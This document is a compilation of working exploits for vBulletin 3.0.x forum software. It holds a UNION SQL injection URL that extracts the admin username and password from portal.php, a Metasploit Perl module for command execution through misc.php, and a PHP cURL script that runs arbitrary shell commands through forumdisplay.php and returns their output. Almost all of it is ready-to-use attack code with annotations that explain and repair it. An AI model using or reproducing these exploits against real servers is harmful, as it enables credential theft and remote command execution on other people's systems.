vBulletin 3.0.10
SQL injection (UNION-based) in portal.php via the `featureid` parameter. The PoC below selects 14 columns (0..13) and pulls `username` and `password` from the `user` table for `userid=1` into columns 5 and 13; `/**/` comments stand in for spaces and the trailing `/*` comments out the rest of the original query. `123.com` is a placeholder host.
http://123.com/portal.php?id=54&a=viewfeature&featureid=99999/**/UNION/**/SELECT/**/0,1,2,3,4,username,6,7,8,9,10,11,12,password/**/from/**/user/**/where/**/userid=1/*
vBulletin 3.0.6
Command execution exploit — Metasploit 2.x Perl module (`php_vb3_0_6.pm`). As the module title states, it applies only when the vBulletin option "Add Template Name in HTML Comments" is set to Yes; the command is injected through the `template` parameter of misc.php (default path `/forum/misc.php`, configurable via RPATH).
##
# Title: vBulletin <= 3.0.6 (Add Template Name in HTML Comments = Yes) command execution eXploit
# Name: php_vb3_0_6.pm
# License: Artistic/BSD/GPL
# Info: trying to get the command execution exploits out of the way on milw0rm.com. M's are always good.
#
#
# - This is an exploit module for the Metasploit Framework, please see
# http://metasploit.com/projects/Framework for more information.
##
package Msf::Exploit::php_vb3_0_6;
use base "Msf::Exploit";
use strict;
use Pex::Text;
use bytes;
# No advanced options for this module.
my $advanced = {};

# Static module description consumed by the framework: name, user options,
# payload constraints and references.
my $info = {
    'Name'    => 'vBulletin <= 3.0.6 (Add Template Name in HTML Comments = Yes) command execution eXploit',
    'Version' => '$Revision: 1.0 $',
    'Authors' => [ 'str0ke' ],
    'Arch'    => [],
    'OS'      => [],
    'Priv'    => 0,

    # Option => [ flag (1/0; presumably "required" — framework convention,
    # confirm), type, description, optional default ]
    'UserOpts' => {
        'RHOST' => [ 1, 'ADDR', 'The target address' ],
        'RPORT' => [ 1, 'PORT', 'The target port', 80 ],
        'VHOST' => [ 0, 'DATA', 'The virtual host name of the server' ],
        'RPATH' => [ 1, 'DATA', 'Path to the misc.php script', '/forum/misc.php' ],
        'SSL'   => [ 0, 'BOOL', 'Use SSL' ],
    },

    'Description' => Pex::Text::Freeform(qq{
This module exploits a code execution flaw in vBulletin <= 3.0.6.
}),

    'Refs' => [
        [ 'MIL', '832' ],
    ],

    # Command payloads only; the command text is limited to 512 bytes.
    'Payload' => {
        'Space' => 512,
        'Keys'  => [ qw(cmd cmd_bash) ],
    },

    'Keys' => [ 'vBulletin' ],
};
# Constructor: hands the static module description and (empty) advanced
# options to the framework base class, forwarding any extra arguments.
sub new {
    my ($class, @args) = @_;
    return $class->SUPER::new(
        { 'Info' => $info, 'Advanced' => $advanced },
        @args,
    );
}
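# Build and send the single GET request that injects the payload command
# into misc.php's template parameter. The HTTP response is read (so the
# server finishes the request) but not interpreted: the cmd/cmd_bash
# payloads are expected to do their own work (e.g. connect back).
sub Exploit {
    my $self = shift;

    # Target parameters from UserOpts; VHOST falls back to the target address.
    my $target_host = $self->GetVar('RHOST');
    my $target_port = $self->GetVar('RPORT');
    my $vhost       = $self->GetVar('VHOST') || $target_host;
    my $path        = $self->GetVar('RPATH');

    # Raw command string of the selected payload.
    my $cmd = $self->GetVar('EncodedPayload')->RawPayload;

    # Express the command as chr(..).chr(..)... so that no byte of the
    # command itself (quotes, spaces, etc.) has to appear in the URL.
    my $byte = join('.', map { "chr($_)" } unpack('C*', $cmd));

    # Query string: the template name becomes a PHP expression that
    # passthru()s the decoded command.
    my $data = "?do=page&template={\${passthru($byte)}}";

    # Plain GET, no body. The earlier version also sent Content-Type and
    # Content-Length headers describing a body that never followed; a
    # server honouring Content-Length may then sit waiting for that body
    # until a timeout instead of closing the connection, so they are gone.
    my $req =
        "GET $path$data HTTP/1.1\r\n".
        "Host: $vhost:$target_port\r\n".
        "Connection: Close\r\n".
        "\r\n";

    my $s = Msf::Socket::Tcp->new(
        'PeerAddr'  => $target_host,
        'PeerPort'  => $target_port,
        'LocalPort' => $self->GetVar('CPORT'),
        'SSL'       => $self->GetVar('SSL'),
    );
    if ($s->IsError) {
        $self->PrintLine('[*] Error creating socket: ' . $s->GetError);
        return;
    }

    $self->PrintLine("[*] Sending the malicious vBulletin Get request...");
    $s->Send($req);

    # Drain the response (20 s timeout); its content is intentionally unused.
    my $results = $s->Recv(-1, 20);
    $s->Close();
    return;
}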
1;
vBulletin 3.0.x up to 3.0.4 (range as stated in the script's own banner)
Command execution — standalone PHP/cURL script injecting a backtick expression through forumdisplay.php (`GLOBALS[]=1` plus the `comma` parameter).
magic_quotes_gpc must be disabled on the target: the injected value contains double quotes and backticks, which magic quotes would backslash-escape and so break the injection.
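<?php
// vBulletin 3.0.x (<= 3.0.4) forumdisplay.php command execution, original by
// AL3NDALEEB. Injects a backtick expression via the `comma` parameter (with
// GLOBALS[]=1, as in the original advisory), then cuts the command output
// out of the returned page between two marker strings.
//
// Requirements: cURL extension locally; on the target magic_quotes_gpc must
// be off (the injected value carries raw quotes and backticks).
//
// Usage: php vb30x.php <url> <forumid> <command> [proxy]

if (!function_exists('curl_init')) {
    echo "cURL extension required\n";
    exit;
}

// Need url, forumid and command. Testing $argv[3] for truthiness (as the
// original did) rejects a command of "0" and warns when it is absent.
if (count($argv) < 4) {
    echo "vbulletin 3.0 > 3.0.4 execute command by AL3NDALEEB al3ndaleeb[at]uk2.net\n\n";
    echo "Usage: ".$argv[0]." <url> <forumid> <command> [proxy]\n\n";
    echo "<url> url to vbulletin site (ex: http://www.vbulletin.com/forum/)\n";
    echo "<forumid> forum id\n";
    echo "<command> command to execute on server (ex: 'ls -la')\n";
    echo "[proxy] optional proxy url (ex: http://proxy.ksa.com.sa:8080)\n\n";
    echo "ex :\n";
    echo "\tphp vb30x.php http://www.vbulletin.com/forum/ 2 \"ls -al\"";
    exit;
}

// The usage example ends with '/', which would otherwise yield '//forumdisplay.php'.
$url     = rtrim($argv[1], '/');
$forumid = intval($argv[2]);
$command = $argv[3];
$proxy   = isset($argv[4]) ? $argv[4] : '';

// The injected value is read from $_GET, which PHP URL-decodes, so encoding
// the whole value lets spaces, '&', '#', '+' and '%' in the command survive
// the query string while the quotes/backticks still arrive unescaped.
$payload = '".`echo _START_`.`' . $command . '`.`echo _END_`."';
$action  = 'forumdisplay.php?GLOBALS[]=1&f=' . $forumid . '&comma=' . rawurlencode($payload);

$ch = curl_init();
if ($proxy !== '') {
    curl_setopt($ch, CURLOPT_PROXY, $proxy);
}
curl_setopt($ch, CURLOPT_URL, $url . '/' . $action);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$res = curl_exec($ch);
if ($res === false) {
    echo "request failed: " . curl_error($ch) . "\n";
    curl_close($ch);
    exit(1);
}
curl_close($ch);

// Locate the markers explicitly: strpos() returns false when a marker is
// missing, and the original's false+7 arithmetic then printed garbage.
$start = strpos($res, '_START_');
$end   = ($start === false) ? false : strpos($res, '_END_', $start + 7);
if ($start === false || $end === false) {
    echo "output markers not found in response (not vulnerable, wrong path, or magic_quotes_gpc on?)\n";
    exit(1);
}
echo substr($res, $start + 7, $end - ($start + 7));
?>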